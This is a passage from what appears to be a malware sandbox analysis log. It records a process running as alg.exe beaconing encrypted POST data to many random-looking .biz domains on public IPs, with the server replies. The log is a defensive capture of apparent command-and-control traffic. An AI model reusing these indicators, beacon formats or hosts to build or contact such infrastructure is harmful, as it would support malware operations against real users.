                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102737904 CET778OUTData Raw: 92 da 0e 7a 88 1b 1a 26 fe 02 00 00 f1 ac a2 a5 be 6c 5d eb 0d 52 28 7c 6a da e7 09 e9 37 0d f9 cc d1 bb ce de 48 ad fc a7 60 d7 1b 14 8b 09 3c e2 55 fe a2 6f 1b e8 ef 8f 0c 54 7d 64 4c 7e 41 ec b6 1d 50 7c 48 1a e4 70 b5 8c c0 d5 77 2e 5d 35 a5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z&l]R(|j7H`<UoT}dL~AP|Hpw.]5c_}jksB;8TuQH)xJ^#m&&y,W(>HK]rvxpMo"&0OI}d5aJXR3+re,WHW${
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.058840036 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=45068329dc5ebc2a597ef5395216a55e|155.94.241.188|1730129896|1730129896|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        50192.168.2.44988185.214.228.140806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.865041971 CET349OUTPOST /eoefw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.865092993 CET778OUTData Raw: 30 fd 07 49 4c 1a 9e fb fe 02 00 00 18 09 96 fa a1 1e b6 20 eb 0b 83 c5 03 77 3c 28 8c dc 5f 5b 35 b5 60 dd c5 5d 13 87 50 e3 d6 7f 8a 07 7b d9 9a a4 44 1a 2c 8f 85 cf 90 6b 4d 72 7d 7e b6 3f 5b 21 e4 2e 11 85 cd 84 50 1e 80 ff 3c 40 aa 24 d6 51
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0IL w<(_[5`]P{D,kMr}~?[!.P<@$Q($2h -V 4k-0-34!oX"cN0`Km{h.Q*&*nR=}?s9v_/XR-S$OYtPTs,s;
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.749891043 CET161INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.750019073 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        51192.168.2.44988947.129.31.212806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.973161936 CET349OUTPOST /mhxqli HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.973196983 CET778OUTData Raw: 9e 8a 83 8f f6 d3 f5 93 fe 02 00 00 fa b2 02 9b 2b e2 64 96 58 fe b2 e1 41 ee 70 c1 5e 47 01 6e 95 54 22 72 72 64 24 57 44 98 20 44 6f c8 47 e3 57 02 12 2d 20 60 e8 10 de 20 a9 7e 50 88 5a ad 3a 91 f9 6a 91 15 c0 4e ce 11 4b fe b0 70 ea 52 e4 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +dXAp^GnT"rrd$WD DoGW- ` ~PZ:jNKpR/-\ -5/_|xOS&j%{USNt'.3,_~H*Pc#ew,P<|<}s;{|o67B@dE4*_u`6:zVE
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.549344063 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=61967127a8b6d6d7f65dfcc5856ae5f6|155.94.241.188|1730129900|1730129900|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        52192.168.2.44989834.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.600442886 CET349OUTPOST /boadhtoh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.600442886 CET778OUTData Raw: 58 ba 22 33 55 5b b9 3d fe 02 00 00 57 bf 5b bd cd 89 d1 3b f7 2f 41 11 87 55 1d ef d0 14 26 f5 fd 1f 5e cb 32 b6 61 48 17 82 9d 65 b8 a1 3f ee 97 b9 2f 21 2d 8c 27 bb af da 2a c3 c6 6a 60 00 92 c1 4d 0e 73 df 9c 12 6e 82 d3 89 cc 5f 88 74 75 90
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X"3U[=W[;/AU&^2aHe?/!-'*j`Msn_tur|q%GEs&*.+IIV^XVn!JC>mLh$j72]xQc##d%Dq/nfT"2a}V|wxIJHzHJ


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        53192.168.2.44990434.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.369923115 CET348OUTPOST /aonsotl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:21.369949102 CET778OUTData Raw: 66 64 aa 05 9e 42 bb 13 fe 02 00 00 80 f8 d2 55 5b 70 2b 81 76 8b 59 7e 78 66 6e ef 64 c4 80 ed fb e2 36 a2 96 5e 94 f1 7c bd c3 6d 8f 25 dc e8 9c c1 ff f8 63 56 29 bb a5 77 48 04 0b 47 10 ed f6 f0 33 fe 9b 11 ba 63 79 d3 2c 89 d1 36 7d 96 b2 52
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fdBU[p+vY~xfnd6^|m%cV)wHG3cy,6}R8cJijsS]d:f[[.s Sj*>%QV"a_3Nml.xR>svA(o=+MvQm(#c|YoJ"n/&AN:[h};
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.198882103 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0eca0b912da7c4ff33a1214f49e9b5dc|155.94.241.188|1730129902|1730129902|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        54192.168.2.44990947.129.31.212806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.230040073 CET357OUTPOST /ejfywbwbdmnosnl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.230063915 CET778OUTData Raw: 8f 1c d8 ad 83 b2 fe bd fe 02 00 00 63 98 32 4b 20 6a cf 3d 68 96 e4 cb 75 dc b8 3c 11 e2 96 34 56 d1 60 3d fa 2e e1 ce 40 46 73 c2 ec 38 fc 03 17 4c 31 6a 06 c8 38 46 0e c0 27 89 75 c3 a4 b9 3b 26 a2 28 56 e1 93 44 81 aa 88 a2 fe 17 fc 60 00 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: c2K j=hu<4V`=.@Fs8L1j8F'u;&(VD`/kHS1-E|+'a*zrgx![~X@-k*fzdb9Gs@'@X0*Ees5ngUB)Y*y3fu[JWBFou
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.677093983 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3100dba8f70b56e9d6cb29db789ec204|155.94.241.188|1730129903|1730129903|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        55192.168.2.44991718.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.817389011 CET357OUTPOST /inujhuaraisu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.817421913 CET778OUTData Raw: fc 5c 14 51 a1 09 77 30 fe 02 00 00 10 22 42 e6 17 f1 51 46 6b 3b 5f 35 af 38 c7 bf 5a c9 f2 af 00 16 75 c3 e8 1a 57 31 94 b8 d1 ba e1 51 ac 5b 89 92 7e ae d5 8d 78 f2 0e b5 52 06 9a 0c 90 f7 b9 ed 83 14 e6 e0 aa 1d 08 6d 16 96 f3 3d 01 c9 48 e5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \Qw0"BQFk;_58ZuW1Q[~xRm=HMLTCv~hm?tLvg^7PCa?.UN/tgvBr!(N/W2yjZOLfCn9TaHQ]9w@iufH.&,bo}1vGR
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.474181890 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=39b0ad0a1458b3ac915384dc59499348|155.94.241.188|1730129904|1730129904|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        56192.168.2.44992113.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.507339954 CET354OUTPOST /ahomqbxdjyyc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.507339954 CET778OUTData Raw: 3f e5 21 4d db ef ad f8 fe 02 00 00 a0 12 b9 32 17 77 e4 4e c3 4a 57 7b 5f 2a 1a 7e d1 78 ec 7e 7e a3 9e 50 65 e8 2c 52 84 a5 d2 09 ea 13 a2 90 54 52 02 03 2d 0f ca 27 96 a0 b7 98 86 20 a7 92 15 70 92 d1 61 24 fa b2 8d 8b 7a 0f 23 45 2b 6f 17 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?!M2wNJW{_*~x~~Pe,RTR-' pa$z#E+o8(#^k}IO]c,E<.Rz5uX3LxKtN*>aop\+`i31[F:DCVxh>BWalL, y="z{a


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        57192.168.2.44992613.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.351178885 CET354OUTPOST /fcekfjqtslvl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.351222038 CET778OUTData Raw: 4b 77 a7 ea dd 43 02 e5 fe 02 00 00 0e de e1 99 3c 70 38 98 e1 fe 6c 3e b1 c6 38 87 ee d9 db 81 0c b2 05 a2 10 c2 c5 06 aa 25 a9 a0 93 69 15 6c d3 c0 83 e8 01 d0 45 7b 91 4f 05 7a ce b6 e8 9c eb e7 8b 9d fe 30 db 2b e9 55 47 d7 26 cc 62 39 51 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: KwC<p8l>8%ilE{Oz0+UG&b9Q/NctlpQevG]>@GWV`iB{g*x:~scN4&cYw=/b^a@;J1s\1*Yp4K*>MgI%'M,-#;xn|t4f,vL'5Re
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.774348021 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f81aca2393830fd186d4ee7fcdd25057|155.94.241.188|1730129906|1730129906|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        58192.168.2.44993534.246.200.160806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.799005985 CET349OUTPOST /ltqh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.799040079 CET778OUTData Raw: a3 48 0e 0f c3 70 3a d8 fe 02 00 00 92 ff 41 95 29 4b 5b f3 8c 3e a2 88 39 c1 f1 77 c6 a4 49 da db c1 a1 8e 50 8c a4 74 4a a8 90 5f 5f a6 08 1d 41 a6 ea 91 68 5b 19 cd 01 28 40 e1 ca e2 5b 63 a0 d2 50 3c 18 20 cb 12 50 42 73 fb d9 a6 11 48 ae a2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Hp:A)K[>9wIPtJ__Ah[(@[cP< PBsH8j#8rjG@v|Es,9dD{td//V6+D^K1I`=.Y9P'pQ#!{M'9W^g#|c
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.774780989 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=40c6e01c56e9e92acf8728a9a86c1506|155.94.241.188|1730129907|1730129907|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        59192.168.2.44994118.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795793056 CET357OUTPOST /pmpevwipwdmvqi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795804977 CET778OUTData Raw: ad a9 8e 40 37 9e 36 f7 fe 02 00 00 5a fb e5 a2 3b 2a 4a 6a 5b 98 f2 91 d1 55 78 dc 1d 15 6b b7 2a 60 eb 04 26 00 c0 6c 4f 4e 4d e9 76 b9 5f 6f 72 86 c3 18 49 80 12 ed 3e f7 fc b7 c8 f2 d1 66 90 49 1f 86 c1 4d 7f ed 9c de 7d aa 0f 34 14 87 d8 b2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: @76Z;*Jj[Uxk*`&lONMv_orI>fIM}4A_l g4RA#m]75,9Q?<;7zc_=J)r`.tH%DLnJV,-%K>BGG,FU>Y9dJccIkqhGg\Y
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.232007980 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2dc518f9655444dca276232d963524cd|155.94.241.188|1730129908|1730129908|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        60192.168.2.44995213.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288954973 CET347OUTPOST /qbtfbn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
